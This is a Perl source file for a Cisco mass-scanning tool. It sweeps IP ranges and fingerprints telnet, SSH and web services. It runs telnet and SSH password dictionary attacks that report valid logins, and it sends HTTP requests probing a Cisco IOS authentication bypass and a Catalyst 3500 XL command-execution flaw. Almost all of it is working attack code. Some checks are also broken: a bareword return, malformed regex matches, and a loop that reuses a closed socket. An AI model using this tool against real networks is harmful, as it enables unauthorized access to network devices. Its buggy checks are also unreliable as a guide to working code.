#!/usr/bin/perl
use IO::Socket;
use Net::hostent;
use Getopt::Std;
use Net::Telnet;
use Net::SSH::Perl;
use POSIX;


my $version = "0.1";
$max_processes=20;
$hosts_per_process=10;
$passfile= "password.txt";
$usersfile="users.txt";
$fingerprintdb = "fingerprint.db";
$tmplogprefix="/tmp/tmplog";
$logfile="scan.log";
$llevel="cdv";

my $port = "80";	# web service port

&getopts('AtsduVl:w:z:a:XF:O:b');
use vars qw(
  $opt_A
  $opt_t
  $opt_s
  $opt_d
  $opt_u
  $opt_V
  $opt_l
  $opt_w
  $opt_z
  $opt_a
  $opt_X
  $opt_F
  $opt_O
  $opt_b
);

if ( !$opt_F ) { $host = $ARGV[0]; }
else { chomp $opt_F; $targetfile = $opt_F }

if ($opt_V)
{
	print(" Version $version\n");
	exit(0);
}
if (
	    ( !$host && !$opt_F )
	 || ( $host && $opt_F )
	 || (        !$opt_A
		  && !$opt_t
		  && !$opt_s
		  && !$opt_w
		  && !$opt_z
		  && !$opt_a
		  && !$opt_X
		  && !$opt_F
		  && !$opt_u
		  && !$opt_b
		  && !$ARGV[1] )
  )
{
	&usage;
	exit(0);
}

if ( $opt_b && !($opt_t || $opt_s) )
{
	print (" -b should only be used with either -t or -s option\n");
	exit(0);
}

$logfile = $opt_O if $opt_O;

print("\n");
&banner;

if ($opt_l)
{

	if ( ( $opt_l !~ /^[cdv]+$/ ) )
	{
		print "Unknown loglevel defenition: " . $opt_l . "\n";
		exit(0);
	}
	$llevel = $opt_l;
}
if ($opt_z)
{
	if ( !$opt_A && !$opt_w )
	{
		print("Please define more options\n");
		print("Quitting...\n");
		unlink "output.$host";
		exit(0);
	}
	chomp($opt_z);
}
if ($opt_F)
{
	$date = `date`;
	open( TARGETLIST, "$targetfile" )
	  || die "$0:     Could not read from $targetfile! ($!)";
	while (<TARGETLIST>) { chomp; push( @targetlist, $_ ); }
} else
{
	if ( $host =~ /[A-z]/ )
	{
		@targetlist=($host);
	} else
	{
		&GetRange;
	}
}

$tgt_cnt = $#targetlist + 1;
log_print( "List of targets contains $tgt_cnt host(s)\n", "c" );

# Determine how many scanner processes is required ------------------------------------------------------

$proc_cnt = $tgt_cnt / $hosts_per_process > $max_processes ? $max_processes : floor($tgt_cnt / $hosts_per_process);
$proc_tgt_cnt = ceil( $tgt_cnt / ($proc_cnt + 1) );
log_print( "Will fork $proc_cnt additional scaner processes\n", "c" ) if $proc_cnt;

# Fork scanner processes --------------------------------------------------------------------------------

@children = ();
for ($bi = 0, $pid = -1 ; $bi < $tgt_cnt - $proc_tgt_cnt; $bi += $proc_tgt_cnt)
{
	last if !($pid = fork());
	push(@children, $pid);
}

# Determine scan range for each process -----------------------------------------------------------------

$ei = $bi + $proc_tgt_cnt <= $tgt_cnt ? $bi + $proc_tgt_cnt - 1 : $tgt_cnt - 1;	
$start = @targetlist[$bi];
$end = @targetlist[$ei];
@targetlist = @targetlist[$bi..$ei];

# Perform the scan --------------------------------------------------------------------------------------

log_print( "Range Scan from $start to $end\n", "c" ) unless ( "$start" eq "$end" );
foreach $host (@targetlist)
{
	log_print( "$$:\tChecking $host ...\n", "c" );
	log_start();
	&scanit;
	log_write("Host: $host *****************************************************\n");
}

if ($pid)	# Master process
{
	{} until wait() == -1;	# Wait for clildren to terminate
	&endbanner;

	push (@children, $$);	
	foreach $cpid (@children)
	{
		`cat $tmplogprefix.$cpid >>$logfile && rm -f $tmplogprefix.$cpid` if (stat("$tmplogprefix.$cpid"))
	}
}

# end core
###############
# Subroutines #
###############
sub scanit
{
	if ( !&check_ip($host) )
	{
		log_print( " trying to resolve hostname $host\n\n", "c" );
		my $handler = gethost($host);
		if ( !$handler )
		{
			log_print( "$host does not resolve, I died\n\n", "c" );
			exit(0);
		}
		$target = inet_ntoa( @{ $handler->addr_list }[0] );
		log_print( "resolved host to: $target\n\n", "i" );
		$host_resolves = 1;
	} else
	{
		$target        = $host;
		$host_resolves = 0;
	}
	if ($opt_A)
	{
		$opt_u = "1";
		$opt_t = "1";
		$opt_w = "a";
		$opt_s = "1";

		#now you can undef opt_A in case of no web.
		# undef after this line
	}
	if ($opt_t)
	{
		if (telnetfprint())
		{
			 telnet_leak_user() ? pwdbforce() : bruteforce(0) if $opt_b;
		}
	}
	if ($opt_s)
	{
		if (sshfprint())
		{
			bruteforce(1) if $opt_b;
		}
	}
	if ($opt_w)
	{
		&checkweb;
	}
}

sub check_ip
{
	my $ipaddr = shift;
	if ( $ipaddr !~ /^[0-9\.]+$/ ) { return 0 }
	if ( $ipaddr !~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/ ) { return 0 }
	for ( $1, $2, $3, $4 ) { return 0 if ( $_ > 255 ) }
	return 1;
}

sub usage
{
	print( " version $version\nusage: ./cisco-torch.pl <options> <IP,hostname,network>\n\n"
	);
	print("or: ./cisco-torch.pl <options> -F <hostlist>\n\n");
	print("Available options:\n");
	print("-O <output file>\n");
	print("-A\t\tAll scan types combined\n");
	print("-t\t\tCisco Telnetd scan\n");
	print("-s\t\tCisco SSHd scan\n");
	print("-b\t\tPassword dictionary attack (use with -s or -t only)\n");
	print("-u\t\tSNMP scan (not implemented in the alpha version)\n");
	print("-V\t\tPrint tool version and exit\n");
	print("-l <type>\tloglevel\n");
	print("\t\tc  critical (default)\n");
	print("\t\tv  verbose\n");
	print("\t\td  debug\n");
	print("-w <type>\tCisco Webserver scan\n");
	print("\t\ta  All scans, vulnerabilities included\n");
	print("\t\tv  Fingerprint scan only\n");
	print("-a <NN>\t\tSet different webserver port\n");
	print("examples:\t./cisco-torch.pl -A 10.10.0.0\/16\n");
	print("\t\t./cisco-torch.pl -s -b -F sshtocheck.txt\n");
	print("\t\t./cisco-torch.pl -P 192.168.23.32:3128 -w a -lv 192.168.10.0\/24\n");
}

sub banner
{
	log_print("###############################################################\n", "c" );
	log_print("#   Cisco Torch Mass Scanner 0.1 alpha version                #\n", "c" );
        log_print("#   Becase we need it...                                      #\n", "c" );
	log_print("#   http://www.arhont.com/cisco-torch.pl                      #\n", "c" );
	log_print("###############################################################\n", "c" );
	log_print( "\n", "c" );
}

sub checkweb
{
	undef($noweb);
	log_print( "\n",                                     "h" );
	log_print( "Checking for webserver on port $port\n", "h" );
	log_print( "-----------------------------------\n",  "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => $port,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ($sock)
	{
		if ( $host_resolves == 1 )
		{
			print $sock "HEAD http://$host/ HTTP/1.0\r\n\r\n";
		} else
		{
			print $sock "HEAD / HTTP/1.0\r\n\r\n";
		}
		sleep(2);
		sysread( $sock, $httpversion, 15000 );
		if ( $opt_w =~ /v/ || $opt_w =~ /a/ || $opt_A )
		{
			log_print( "$httpversion\n", "c" );
			if ( $httpversion =~ /Cisco-IOS/ )
			{
				log_print( "Cisco-IOS Webserver found\n\n", "c" );
			}
		}
	} else
	{
		$noweb = 1;
		log_print( "No webserver\n", "i" );
	}
}

sub sshfprint
{
	my	$ret = 0;

	log_print( "Checking for SSH\n", "h" );
	log_print( "----------------\n", "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => 22,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ( !$sock )
	{
		log_print( "No SSH\n\n", "i" );
	}
	while ($sock)
	{
		sleep(5);
		$cnt = sysread( $sock, $buff, 10000 );
		if ( !$cnt )
		{
			log_print( "huh, fscking TCP wrappers, I died\n\n", "i" );
			last;
		}
		if ( $buff =~ /Cisco/ )
		{
			log_print( "Cisco found by SSH banner $buff\n", "c" );
			$ret = 1;
		}
		close($sock);
		last;
	}

	return ret;
}

sub GetRange
{
	$start = $ARGV[0];
	$end   = $ARGV[1];
	if ( $start =~ /\*/ )
	{
		@target = split /\./, $start;
		$start  = (&genipstart);
		$end    = (&genipend);
	}
	( $ippart, $bit ) = split( /\//, $start );

	#CIDR
	if ( $bit ne "" )
	{
		( $a, $b, $c, $d ) = split( /\./, $ippart );
		if ( $bit <= 23 )
		{
			die "Error: CIDR Mask < /24 currently unsupported.\n";
		} elsif ( $bit >= 31 )
		{
			die "Error: CIDR Mask '$bit' is invalid.\n";
		}
		$prefix  = "$a.$b.$c.";
		$network = $d;
		$nhosts  = ( 2**( 32 - $bit ) );
		$netmask = ( 256 - $nhosts );
		unless ( $netmask > 0 && $netmask / $nhosts )
		{
			die "Invalid Network: Netmask $netmask, Hosts $nhosts\n"
			  unless ( $netmask eq 0 );
		}
		$start = $ippart;
		$end = "$prefix" . ( $nhosts + $network - 1 );
	}
	if ( $start ne "" && $end eq "" )
	{
		$end = $start;
	}
	if ( $start eq "" || $end eq "" ) { &InputError; }
	@IPstart = split( /\./, $start );
	@IPend   = split( /\./, $end );
	&Check_Start_and_EndIP;

	#converts "short" (dotted) IPs to "long" (undotted) IPs
	$IPstart =
	  ( ( $IPstart[0] * 16777216 ) + ( $IPstart[1] * 65536 ) +
		( $IPstart[2] * 256 ) + $IPstart[3] );
	$IPend =
	  ( ( $IPend[0] * 16777216 ) + ( $IPend[1] * 65536 ) + ( $IPend[2] * 256 ) +
		$IPend[3] );
	if ( $IPend < $IPstart ) { die "Can't scan backwards"; }
	$CountIp = $IPstart;
	$EndIp   = $IPend + 1;
	while ( $CountIp ne $EndIp )
	{
		@Class = &GetIP($CountIp);
		push( @targetlist, "$Class[1]\.$Class[2]\.$Class[3]\.$Class[4]" );
		$CountIp++;
	}
}

sub GetIP
{

	# converts "long" (undotted) IPs into "short" (dotted) IPs
	my ($ip) = @_;
	$Class[1] = int( $ip / 256**3 );
	$Class[2] = int( $ip % 256**3 / 256**2 );
	$Class[3] = int( $ip % 256**3 % 256**2 / 256**1 );
	$Class[4] = int( $ip % 256**3 % 256**2 % 256**1 );
	@Class;
}

sub InputError
{
	print "need [starting IP] [ending IP]\n\n";
	die "Wrong input";
}

sub Check_Start_and_EndIP
{
	if ( !&check_ip($start) )
	{
		print "\nStarting IP is not valid\n";
		die "Exiting on bad starting IP";
	}
	if ( !&check_ip($end) )
	{
		print "\nEnding IP is not valid\n";
		die "Exiting on bad ending IP";
	}
}

sub genipstart
{
	for (@target)
	{
		if ( $_ =~ /\*/ ) { push( @tmp, 0 ); }
		else { push( @tmp, $_ ); }
	}
	"$tmp[0].$tmp[1].$tmp[2].$tmp[3]";
}

sub genipend
{
	for (@target)
	{
		if ( $_ =~ /\*/ ) { push( @tmp2, 255 ); }
		else { push( @tmp2, $_ ); }
	}
	"$tmp2[0].$tmp2[1].$tmp2[2].$tmp2[3]";
}

sub log_start
{
	$log_tmp = "";
	$savelog = 1;
}

sub log_write
{
	$header = shift;

	if ($log_tmp)
	{
		open (LOGTMP, ">> $tmplogprefix.$$") || die "Can't open temporary log";
		print LOGTMP $header if $header;
		print LOGTMP $log_tmp; 
		close (LOGTMP);
	}
	$log_tmp = "";
	$savelog = 0;
}

sub log_print
{
	( my $logstring, $_ ) = @_;
	if (/[$llevel]/)
	{ 
		$log_tmp .= $logstring if $savelog;
		print $logstring;
	}
}

sub telnetfprint
{
	if ( $telnet ne "0" )
	{
		log_print( "Trying simple Telnet fingerprint\n", "h" );
		log_print( "--------------------------------\n", "h" );
		if ( !-e $fingerprintdb )
		{
			log_print( "HUH db not found, it should be in $fingerprintdb\n", "c" );
			log_print( "Skipping Telnet fingerprint\n", "c" );
			return 0;
		}
		my $sock = new IO::Socket::INET(
										 PeerAddr => $target,
										 PeerPort => 23,
										 Proto    => 'tcp',
										 Timeout  => '5'
		  );
		undef($fingerprint);
		undef($description);
		undef($return);
		undef($submitter);
		undef($hit);
		undef($buff);
		if ( !$sock )
		{
			log_print( "No telnet\n", "i" );
			return 0;
		}
		while ($sock)
		{
			sleep(3);
			$cnt = sysread( $sock, $buff, 14 );
			if ( !$cnt )
			{
				log_print( "Hmmm, probably TCP wrappers\n", "i" );
				last;
			}
			@rets = split( //, $buff );
			foreach $currentret (@rets) { $fingerprint .= ord($currentret); }
			close($sock);
			log_print( "Possible OS's\n\n", "h" );
			log_print( "Fingerprint:\t\t\t$fingerprint\n", "c" );
			last;
		}
		if ($fingerprint)
		{
			open FINGERPRINTDB, "<$fingerprintdb" || last; 
			while (<FINGERPRINTDB>)
			{
				( $description, $return, $submitter ) = split( /\!/, $_ );
				if ( "$fingerprint" eq "$return" )
				{
					 $hit = 1;
					 log_print( "Description:\t\t\t$description\n", "c" );
					 log_print( "Fingerprinting Successful\n\n", "c" );
					 last;
				}
			}
			close FINGERPRINTDB;
			$hit || log_print( "Fingerprint not found in database. If you know what it is please\nsubmit it to info\@arhont.com\n", "c" )
		}
		return $buff =~ /Password:/ ? 2 : ($fingerprint ? 1 : 0);
	}
}

#Telnet user leak check

sub telnet_leak_user
{
	my	$ret = 0;

	log_print( "Checking for telnet without a username \n", "h" );
	log_print( "----------------\n", "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => 23,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ( !$sock )
	{
		log_print( "No telnet\n\n", "i" );
	}
	while ($sock)
	{
		sleep(5);
		$cnt = sysread( $sock, $buff, 10000 );
		if ( !$cnt )
		{
			log_print( "huh, fscking TCP wrappers, I died\n\n", "i" );
			last;
		}
		if ( $buff =~ /Password:/ )
		{
			log_print( "Found password only telnet login ", "c" );
			$ret = 1;
		}
		close($sock);
		last;
	}

	return $ret;
}


sub pwdbforce
{
open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);

	foreach $pass (@password)
	{
                my $sock = new IO::Socket::INET(
                                                                                 PeerAddr => $target,
                                                                                 PeerPort => 23,
                                                                                 Proto    => 'tcp',
                                                                                 Timeout  => '5'
                  );
                if ( !$sock )
                {
                        log_print( "No telnet\n", "i" );
                        return;
                }
               	log_print("Trying : $pass\n", "c");
                while ($sock)
                {
                        sleep(3);
                        sysread( $sock, $buff, 1000 ) || last;
			if (! ( $buff =~ /Password:/ ) )
			{
				log_print( "Unexpected prompt\n", "c" );
				close ($sock);
				last;
			}
			syswrite( $sock, $pass."\n" ) || last;
			sysread( $sock, $buff, 1000 ) || last;
			close ($sock);
			if ( $buff =~ /[#>]/ )
			{
                                log_print("*** Found valid password : $pass\n", "c");
                                return;
			}
		}
	}
}


# SSH/Telnet default passwd check 

sub bruteforce
{
my $use_ssh = shift;
my $user, $pass, @users, @password;

open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);
open(USERSFILE, "<$usersfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@users = <USERSFILE>);
close(PASSFILE);

	foreach $user (@users) 
	{
		foreach $pass (@password)
		{
			my $conn =  $use_ssh ? Net::SSH::Perl->new($host) 
					     : Net::Telnet->new("Host" => $host, "Timeout" => 10, "Prompt" => "/[#>]/" );
               		log_print("Trying : $user / $pass\n", "c");
			eval {
			 $conn->login($user, $pass);
        		 $conn->cmd("cmd");
        		};
			$conn->close() unless $use_ssh;
			if (!$@)
			{
                                log_print("*** Found valid login/password pair : $user / $pass\n", "c");
                                return;
			}
		}
	}



}


# Cisco IOS HTTP Auth Vulnerability";
sub cisco_auth_http
{
	my $n = 16;
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => $port,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	while ( $n < 100 )
	{
		if ($sock)
		{
			print $sock "GET /level/" . $n . "/exec/- HTTP/1.0\r\n\r\n";
			sleep(3);
			sysread( $sock, $buff, 1000 );
			$n++;
			if ( $buff =~ ~/http\/1\.0 200 ok/ )
			{
				log_print( "* Cisco IOS HTTP Auth Vulnerability \n\n", "c" );
			}
			close($sock);
		}
	}
}

# Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
sub cisco_catoss_http
{
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => $port,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ($sock)
	{
		print $sock "GET /exec/show/config/cr HTTP/1.0\n\n";
		sleep(3);
		sysread( $sock, $buff, 1000 );
		if ( $buff =~ ~/http\/1\.0 200 ok/ )
		{
			log_print("*  Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n\n",c);
		}
		close($sock);
	}
}

sub endbanner
{
	log_print( "--->\n",                                                  "c" );
	log_print( "- All scans done. Cisco Torch Mass Scanner $version -\n", "c" );
	log_print( "---> Exiting.\n",                                         "c" );
}

